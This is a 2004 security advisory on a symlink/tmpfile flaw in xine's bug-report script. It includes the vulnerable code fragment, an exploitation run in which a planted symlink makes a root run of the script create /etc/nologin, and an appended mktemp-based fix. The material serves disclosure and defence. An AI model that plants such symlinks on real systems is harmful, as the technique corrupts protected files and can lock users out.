~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*
Product: xine-bugreport/xine-check scripts. http://xinehq.de/
Versions: xine-bugreport && xine-check (they are the same script, but 2 copies exist in a system with different names)
Bug: Symlink bug / tmpfile bug.
Impact: Attackers can write to arbitrary files, corrupt sensitive system files, and in theory elevate privileges (unlikely).
Risk: Low/Medium
Date: March 19, 2004
Author: Shaun Colley
Email: shaunige yahoo co uk
WWW: http://www.nettwerked.co.uk
~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*

Introduction
#############

"xine is a free multimedia player. It plays back CDs, DVDs, and VCDs. It also decodes multimedia files like AVI, MOV, WMV, and MP3 from local disk drives, and displays multimedia streamed over the Internet. It interprets many of the most common multimedia formats available - and some of the most uncommon formats, too."
- extracted from the xine project site.

Due to the ongoing, and sometimes experimental, addition of features to xine, a script (there are two copies of the script, /usr/bin/xine-bugreport and /usr/bin/xine-check, and they are *exactly* the same) is included in xine distributions to allow a user to remedy a problem, or to report a bug if their problem could not be solved. However, in the bug-reporting code, the bug report email is dumped to a file in the /tmp directory for the user to use later or send manually. This file is written in an insecure manner, presenting a symlink vulnerability.

Details
########

In the section of the xine-bugreport/xine-check script which assembles a bug report email, a symlink vulnerability exists due to an insecure file write of the finished bug report email template. This may allow an attacker to write to/corrupt sensitive system files, and in theory elevate privileges, although that is unlikely. The bug occurs in the following code fragment:

--- xine-bugreport / xine-check frag ---

[...]
bugreport=/tmp/xine-bugreport
[...]
add ""
add "additional description:"
add "----------------------"
add ""
add "PUT YOUR DESCRIPTION HERE"
add "(please replace these two lines by your complete problem description)"
add ""
add ""
add "system info, as found by xine-check:"
add "-----------------------------------"
cat "$logfile" >>$bugreport   # no file check performed
[...]
--- EOF

As can be seen, no file checks take place before the script (xine-check/xine-bugreport) 'cats' the bug report template into the file defined in the $bugreport variable, /tmp/xine-bugreport.

The xine-check/xine-bugreport script has the following structure:

- Check xine-related configuration
- Suggest hints to fix any problems which might occur
- Ask the user if the hints fixed the problem
- If they did not, ask the user what type of problem they are having
- If the user chooses the "something else" option (option 8), the bug report section of the script starts. This is one place where the vulnerability exists.
- Also, if other options were picked as the type of problem, choosing various things will allow a user to report the problem as a bug.

Due to this insecure method of handling files, a symlink bug presents itself, allowing an attacker to write to/corrupt files with the permissions of the user invoking the xine-bugreport/xine-check script. Exploitation is trivial. Details are presented below.

Exploitation
#############

Below is an example exploitation scenario which I actually carried out on my system.

--- attack ---

[shaun@localhost shaun]$ ls -al /etc/nologin
ls: /etc/nologin: No such file or directory
[shaun@localhost shaun]$ ln -s /etc/nologin /tmp/xine-bugreport

[...]

[root@localhost bin]# xine-bugreport
Please be patient, this script may take a while to run...
logging to /tmp/xine-check.log...
[OUCH!!] You're running me with root permissions?
You should definitely run xine as normal user, not root.
Running it as root will expose you to some severe security issues.
This script should run as the same user that you would use to run xine.
If you run me as root (as you currently are), I cannot check if your real-life user has sufficient permissions...
Unless you want to recheck something with root permissions, you should abort me now (press Ctrl-C) and run me from your usual account.
press to continue...
[ good ] you're using Linux, doing specific tests
[ good ] looks like you have a /proc filesystem mounted.
[ good ] You seem to have a reasonable kernel version (2.4.19-16mdk)
[ good ] intel compatible processor, checking MTRR support
[ good ] you have MTRR support and there are some ranges set.
[ good ] found the player at /usr/bin/xine
[ good ] /usr/bin/xine is in your PATH
[ hint ] No xine-config found. Assuming xine from RPMs
The xine-config script can be used to deternime some file locations used by xine-lib, but you don't have such a script on your system.
However, it looks like you installed xine from the RedHat packages.
So I'll just guess that you are using the standard locations.
If you want me to be sure about those file locations, you can install the 'xine-lib-devel' package (or 'xine-devel', depend on what packages you're using, which contains xine-config.
However, this package is not really needed to run xine...
press to continue...
[ good ] plugin directory /usr/lib/xine/plugins exists.
[ good ] found input plugins
[ good ] found demux plugins
[ good ] found decoder plugins
[ good ] found video_out plugins
[ good ] found audio_out plugins
[ good ] skin directory /usr/share/xine/skins exists.
[ good ] found logo in /usr/share/xine/skins
[ good ] I even found some skins.
[ good ] /dev/cdrom points to /dev/cdroms/../ide/host0/bus1/target1/lun0/cd
[ hint ] /dev/dvd is /dev/dvd, not a DVD device
/dev/dvd is the default device that xine uses for playing DVDs.
You could make your life easier by creating a symlink named /dev/dvd pointing to your DVD device (something like /dev/scd0 or /dev/hdc).
If your DVD-ROM device is /dev/hdb (slave ATAPI device on primary bus),
rm /dev/dvd
ln -s hdb /dev/dvd
typed as root will give you the symlink.
Alternatively, you can configure xine to use the real device directly, using the setup dialog within xine, but I can't check your DMA settings in that case...
press to continue...
[ good ] found xvinfo: X-Video Extension version 2.2
[ hint ] Your X server doesn't support YUV overlays.
That means xine will have to to color space transformation and scaling in software, which is quite CPU intensive.
Maybe upgrading your X server will help here.
If you have an ATI card, you'll find accelerated X servers on http://www.linuxvideo.org/gatos/
press to continue...
[ hint ] Your X server doesn't support packed YUV overlays.
That means xine will have to to color space transformation and scaling in software, which is quite CPU intensive.
Maybe upgrading your X server will help here.
If you have an ATI card, you'll find accelerated X servers on http://www.linuxvideo.org/gatos/
press to continue...
[ hint ] Your X server doesn't have any XVideo support...
XVideo is an X server extension introduced by XFree86 4.x.
This extension provides access to hardware accelerated color space conversion and scaling, which gives a great performance boost.
If you have a fast (>1GHz) machine, you may be able to watch all kinds of video, anyway.
You will waste lots of CPU cycles, though...
press to continue...
Could you solve your xine problems using the previous hints? (y/n)? '
pardon?? neither yes nor no? assuming no...
What kind of trouble does xine cause for you?
1) plays audio, but no video
2) plays video, but no audio
3) audio is interrupted and/or crackling
4) audio and video are out of sync
5) can't play DVDs
6) xine hangs instead of playing anything
7) xine doesn't start
8) something else

[root@localhost bin]# xine-bugreport
Please be patient, this script may take a while to run...
logging to /tmp/xine-check.log...
[OUCH!!] You're running me with root permissions?
You should definitely run xine as normal user, not root.
Running it as root will expose you to some severe security issues.
This script should run as the same user that you would use to run xine.
If you run me as root (as you currently are), I cannot check if your real-life user has sufficient permissions...
Unless you want to recheck something with root permissions, you should abort me now (press Ctrl-C) and run me from your usual account.
press to continue...
[ good ] you're using Linux, doing specific tests
[ good ] looks like you have a /proc filesystem mounted.
[ good ] You seem to have a reasonable kernel version (2.4.19-16mdk)
[ good ] intel compatible processor, checking MTRR support
[ good ] you have MTRR support and there are some ranges set.
[ good ] found the player at /usr/bin/xine
[ good ] /usr/bin/xine is in your PATH
[ hint ] No xine-config found. Assuming xine from RPMs
The xine-config script can be used to deternime some file locations used by xine-lib, but you don't have such a script on your system.
However, it looks like you installed xine from the RedHat packages.
So I'll just guess that you are using the standard locations.
If you want me to be sure about those file locations, you can install the 'xine-lib-devel' package (or 'xine-devel', depend on what packages you're using, which contains xine-config.
However, this package is not really needed to run xine...
press to continue...
[ good ] plugin directory /usr/lib/xine/plugins exists.
[ good ] found input plugins
[ good ] found demux plugins
[ good ] found decoder plugins
[ good ] found video_out plugins
[ good ] found audio_out plugins
[ good ] skin directory /usr/share/xine/skins exists.
[ good ] found logo in /usr/share/xine/skins
[ good ] I even found some skins.
[ good ] /dev/cdrom points to /dev/cdroms/../ide/host0/bus1/target1/lun0/cd
[ hint ] /dev/dvd is /dev/dvd, not a DVD device
/dev/dvd is the default device that xine uses for playing DVDs.
You could make your life easier by creating a symlink named /dev/dvd pointing to your DVD device (something like /dev/scd0 or /dev/hdc).
If your DVD-ROM device is /dev/hdb (slave ATAPI device on primary bus),
rm /dev/dvd
ln -s hdb /dev/dvd
typed as root will give you the symlink.
Alternatively, you can configure xine to use the real device directly, using the setup dialog within xine, but I can't check your DMA settings in that case...
press to continue...
[ good ] found xvinfo: X-Video Extension version 2.2
[ hint ] Your X server doesn't support YUV overlays.
That means xine will have to to color space transformation and scaling in software, which is quite CPU intensive.
Maybe upgrading your X server will help here.
If you have an ATI card, you'll find accelerated X servers on http://www.linuxvideo.org/gatos/
press to continue...
[ hint ] Your X server doesn't support packed YUV overlays.
That means xine will have to to color space transformation and scaling in software, which is quite CPU intensive.
Maybe upgrading your X server will help here.
If you have an ATI card, you'll find accelerated X servers on http://www.linuxvideo.org/gatos/
press to continue...
[ hint ] Your X server doesn't have any XVideo support...
XVideo is an X server extension introduced by XFree86 4.x.
This extension provides access to hardware accelerated color space conversion and scaling, which gives a great performance boost.
If you have a fast (>1GHz) machine, you may be able to watch all kinds of video, anyway.
You will waste lots of CPU cycles, though...
press to continue...
Could you solve your xine problems using the previous hints? (y/n)? n
What kind of trouble does xine cause for you?
1) plays audio, but no video
2) plays video, but no audio
3) audio is interrupted and/or crackling
4) audio and video are out of sync
5) can't play DVDs
6) xine hangs instead of playing anything
7) xine doesn't start
8) something else
please select (1..8): 8
please describe your xine problem briefly in _one_ line ( < 65 characters):
hello world
You should include a _complete_ copy of xine's output in your bug report.
Note, however, that there is a 40K limit on messages sent to the mailing list,
So you should strip down the parts that repeat over and over, if there are any.
You can either copy&paste this output from the terminal where you ran xine,
or you can collect xine's output in a file named /tmp/xine.out, using this command:
xine >/tmp/xine.out 2>&1
(assuming you have a Bourne compatible shell, like bash, for example)
If you need to add any parameters, you can do so...
This method is useful if you want to remove part of the output...
Which method would you prefer?
1) copy&paste
2) logfile /tmp/xine.out
please select (1..2): 2
please press when you have the log ready in /tmp/xine.out
Hmmm, I could not read the /tmp/xine.out file.
Skipping this step. You may add the output later, if this wasn't your intention...
press to continue...
Okay. That's all I could guide you through...
I have assembled a skeleton for your bugreport in the file /tmp/xine-bugreport
You're strongly encouraged to add a detailed description of your problem.
Just look for 'additional description', and fill it in...
When you're finished, you can use your favourite mailer to send it to .
Please use this subject line, or something similar:
Subject: bug: hello world
Alternatively, I could try to send the bug report for you, using
/bin/mail -s "bug: hello world"
Please make sure to add the additional description before saying "yes"!
Do you want me to do this now? (y/n)? n
Thanks for your bugreport! Have a nice day!

[...]
[shaun@localhost shaun]$ ls -al /etc/nologin
-rw-r--r--    1 root     root         1756 Mar 20 21:56 /etc/nologin
[shaun@localhost shaun]$

---

Summary
########

The vulnerability can *ONLY* be exploited when the user enters the part of the xine-check/xine-bugreport script which allows them to send a bug report to the Xine developers. This is the part of the script in which the insecure file handling is performed, and thus where the symlink bug manifests. While it may be unlikely that these conditions occur, the results can be fairly severe, as demonstrated above.

Credit
#######

This issue was discovered by shaun2k2 / Shaun Colley - .
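The fix a maintainer would apply to the `cat "$logfile" >>$bugreport` write from the Details section is shown below as an added example. It is not part of this advisory and not xine's own xine-check code; it assumes only POSIX sh and a `mktemp` that accepts a template. The function names (`create_report`, `path_is_free`, `demo`) and the scratch directory used by `demo` are constructed for the illustration.

```shell
#!/bin/sh
# Added example (not xine's code): two ways to avoid the /tmp symlink problem
# the advisory describes, plus a self-contained demonstration.

# 1. Preferred: drop the fixed "bugreport=/tmp/xine-bugreport" and let mktemp
#    create a fresh, uniquely named file (O_CREAT|O_EXCL, mode 0600). A link or
#    file planted at a predictable name can then never be followed.
#    $1 is the xine-check log to append; the new report path goes to stdout.
create_report() {
    logfile=$1
    report=$(mktemp "${TMPDIR:-/tmp}/xine-bugreport.XXXXXX") || return 1
    {
        echo "additional description:"
        echo "----------------------"
        echo ""
        echo "PUT YOUR DESCRIPTION HERE"
        echo ""
        echo "system info, as found by xine-check:"
        echo "-----------------------------------"
        cat "$logfile"
    } >>"$report" || return 1
    echo "$report"
}

# 2. Fallback for a script that must keep a fixed, predictable path: refuse to
#    write when anything already occupies it. -L is checked as well as -e so a
#    dangling symlink (which -e alone would miss) also counts as occupied.
#    Returns 0 when the path is free, 1 otherwise.
path_is_free() {
    if [ -e "$1" ] || [ -L "$1" ]; then
        return 1
    fi
    return 0
}

# Demonstration in a constructed scratch directory: a symlink is planted where
# the fixed report path would be, standing in for the advisory's scenario, and
# the guarded code must leave the link's target untouched. Returns 0 on success.
demo() {
    scratch=$(mktemp -d) || return 1
    sensitive="$scratch/sensitive"       # stands in for a protected file
    fixed="$scratch/xine-bugreport"      # stands in for /tmp/xine-bugreport
    log="$scratch/xine-check.log"        # constructed sample log
    echo "original contents" >"$sensitive"
    echo "[ good ] constructed log line" >"$log"
    ln -s "$sensitive" "$fixed"

    # guarded fixed-path write: the planted link makes path_is_free fail
    if path_is_free "$fixed"; then
        cat "$log" >>"$fixed"            # not reached in this scenario
    fi
    # mktemp-based write: unaffected by anything planted at the fixed name
    report=$(create_report "$log") || return 1

    status=0
    [ "$(cat "$sensitive")" = "original contents" ] || status=1
    grep -q "constructed log line" "$report" || status=1
    rm -rf "$scratch" "$report"
    return $status
}
```

Because `mktemp` creates the file itself with O_EXCL, there is no window between "check" and "write" for an attacker to fill; the `path_is_free` test alone still leaves that race and is only a cheap improvement for scripts that cannot change their output path. Scripts that want both a fixed name and safety should `set -C` (noclobber) and open with `>` rather than `>>`, so the shell itself refuses an existing file or link.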